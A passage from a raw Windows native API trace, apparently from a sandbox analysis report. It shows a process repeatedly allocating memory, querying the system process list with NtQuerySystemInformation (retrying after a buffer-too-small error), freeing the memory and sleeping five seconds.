ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.534] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 